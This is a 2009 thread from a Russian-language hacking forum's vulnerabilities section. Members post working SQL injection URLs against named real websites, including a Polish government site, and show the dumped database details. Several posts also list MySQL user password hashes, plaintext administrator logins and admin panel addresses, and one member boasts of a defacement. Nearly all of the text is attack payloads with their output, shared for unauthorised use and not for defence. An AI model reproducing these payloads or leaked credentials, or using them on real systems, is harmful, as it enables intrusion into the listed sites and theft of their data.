ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7821  
Старый 15.02.2009, 10:38
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.administratordebloc.ro/index.php?action=article&ID=-17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws( 0x3a,version(),database(),user()),13--



Database Version: 5.0.67-community
Database name: admbl_admbl
User name: admbl@localhost



http://www.administratordebloc.ro/admin
 
Ответить с цитированием

  #7822  
Старый 15.02.2009, 12:08
Аватар для Dimionx
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.whitestrip.ru
Google PR: 5
Yandex CY:130


Код:
http://www.whitestrip.ru/news/view/896+union+select+1,2,concat(version(),0x3a,database(),user()),4,5,6,7,8,9/*/
Версия: 5.0.67
Юзер: u15581@78.108.81.41
Бд: b15581_wstrip


Код:
http://www.whitestrip.ru/news/view/896+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*/
Вывод всех табличек

Код:
http://www.whitestrip.ru/news/view/896+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.columns/*/
Вывод всех колонок

Также смотрим на мой мини дефейс)))
www.whitestrip.ru
http://www.whitestrip.ru/pages/dimionx/


 
Ответить с цитированием

  #7823  
Старый 15.02.2009, 12:47
Аватар для DimOnOID
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Код:
http://www.ruscable.ru/board_el/msg-55533+union+select+1,2,3,4,concat_ws(0x15,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16.html
 
Ответить с цитированием

  #7824  
Старый 15.02.2009, 13:18
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://infobase.paiz.gov.pl/indexl.php?action=select_nieruch_id&id=77170948098 0+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a ,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71) ,0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32-- &offset=380&zones_id=&voivodship=&area_min=&area_m ax=
Database Version: 5.0.18-standard
Database name: infobase3
User name: www-data@localhost

Цитата:
http://infobase.paiz.gov.pl/indexl.php?action=select_nieruch_id&id=77170948098 0+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a ,password,0x3a,User,0x3a),0x71),0x71),2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32+from+mysql.user+limit+0,1--
: 054bea7647c4c9ff : root :
: 027a5ebb761cd005 : mrozek :
: 26978fd16e5c7f8b : www-data :



Цитата:
http://playak.com/kayaks.php?id=587614566876870+union+select+1,2,3,c oncat_ws(0x3a,version(),user(),database()),5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34--

5.0.22-log
playak@localhost
playak rating

Цитата:
http://playak.com/kayaks.php?id=587614566876870+union+select+1,2,3,c oncat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34+from+mysql.user+limit+0,1--

admin:6633c79b2fec1807
pma_aqBG7oMhnKtq:4156e69767be6e91
horde:0e843dda46926377
netpresent:250dbe034105d511
seag:2c07485714a923e2
terrag:765d8db733d31334
rosenberg:1a501a431e40f89f
airsquad:59811f9f5eaf68c3
playak:250dbe034105d511
polls:107b804a16be8687
boatinfo:02f0fcf80f7b4bbc
mambo:70f7ce324f035014
nookie:2aa80ddd11d25b68
fish:4b7be07c38ffcf32
mambo451a:31faef2201fc5b68
kajakvideos:250dbe034105d511
adrian:4bece1e04447a9c9
sugar5:250dbe034105d511

Последний раз редактировалось jokester; 15.02.2009 в 13:51.. Причина: gamershood.com БОЯН
 
Ответить с цитированием

  #7825  
Старый 15.02.2009, 13:46
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

upitup.com - PR5
Код:
http://www.upitup.com/roster/artist.php?aid=1000+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8/*
DB_Ver:4.0.27-standard-log
DB_User:Sql18862@62.149.141.95
DB:Sql18862_1
Таблица с пользователями называется User, интересные поля id,email,username,password
Вытаскиваем одного из админов:
Код:
http://www.upitup.com/roster/artist.php?aid=1000+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),73),73),3,4,5,6,7,8+from+users+limit+1,1/*
admin:3a21adafbcd3d31a17da15c670615005
или уже расшифрованные
admin : p161c4u
Чтобы попасть в админку логинимся и переходим:
Код:
http://www.upitup.com/controlcenter/
 
Ответить с цитированием

  #7826  
Старый 15.02.2009, 14:43
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.ultimabg.com/news.php?lang=en&valuta=&id=-1+union+select+concat_ ws(0x3a,version(), database(),user()),2,3,4,5,6--

Database Version : 5.0.67-msl-usrs-icd1-log
Database name : ultimabg_estatemanager
User name : nkemutf5@localhost


----------------------------------------------------#

Код:
http://www.property-bourgas.com/news.php?id=-1+union+select+1,concat_ ws(0x3a, version(),database(),user()),3,4,5,6--
Database Version : 5.0.67-log
Database name : bourgas
User name : bourgas@localhost


берем админов:

Код:
http://www.property-bourgas.com/news.php?id=-1+union+select+1,concat _ws( 0x3a,id,users,passes),3,4,5,6+from+aeg_accounts+limit+0,1--
1:volid:551278
2:admin:aeg1234

----------------------------------------------------#

Код:
http://www.traditzia.bg/bg/news.php?Id=-1'
инфу о бд не даёт просмотреть ... но за-то смотрим админов:

Код:
http://www.traditzia.bg/bg/news.php?Id=-1+union+select+1,concat _ws(0x3a,id,user,pass),3,4,5,6,7+from+ users+limit+0,1--
1:admin:$tradicija
2:tradicia:4tradici@

а тут сама админка:

Код:
http://www.traditzia.bg/ admin/

Последний раз редактировалось f1ng3r; 15.02.2009 в 15:27..
 
Ответить с цитированием

  #7827  
Старый 15.02.2009, 15:52
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.unarte.ro/unarte/newunarteTST/home.php?l=ro&p=noutati&id=-37+UNION+SELECT+CONCAT_WS(0x3a,version(),database( ),user()),2,3,4




Version : 5.0.67-community
Database : unarte_tetenica
User : unarte_siteuna@localhost
 
Ответить с цитированием

  #7828  
Старый 15.02.2009, 16:14
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.bfu.bg/news/index.php?url=news-detail.php&id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8--
Database Version : 5.0.67-community-nt
Database name : bfu
User name : web@127.0.0.1


---------------------------------------#

Код:
http://www.insurance.bg/news/printnews.php?id=-1+union+select+1,concat_ ws(0x3a,version (),database(),user()),3,4,5,6--
Database Version : 4.0.26-standard-log
Database name :nsurance_main
User name : insurance_local@localhost


смотрим админа:
Код:
http://www.insurance.bg/news/printnews.php?id=-1+union+select+1,concat_ ws(0x3a,id,name,pass),3,4,5,6+ from+users--
1:admin:InsNewsTeam2008

админка:

Код:
http://www.insurance.bg/ admin/login.php
Требует плагин. Нормально заходит под IE.
 
Ответить с цитированием

  #7829  
Старый 15.02.2009, 17:52
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://madint.ru/do.php?id=-6+union+select+1/*

Последний раз редактировалось jokester; 15.02.2009 в 18:34.. Причина: screenroom.co.uk БОЯН
 
Ответить с цитированием

  #7830  
Старый 15.02.2009, 18:18
Аватар для M.W.N.N.
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

http://www.credo.md/pagini/masterat.php?limba=rus&id=24%27+union+select+1,con cat(version(),0x3a,database(),0x3a,user()),3,4,5,6 +limit+1,1/*

5.0.24a:test01:test01@localhost

http://www.99.md/index.php?type=sales&id=36+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33+limit+1,1

version() 5.0.67
user() 99md@localhost
database() 99md_99md

Последний раз редактировалось jokester; 15.02.2009 в 18:37..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ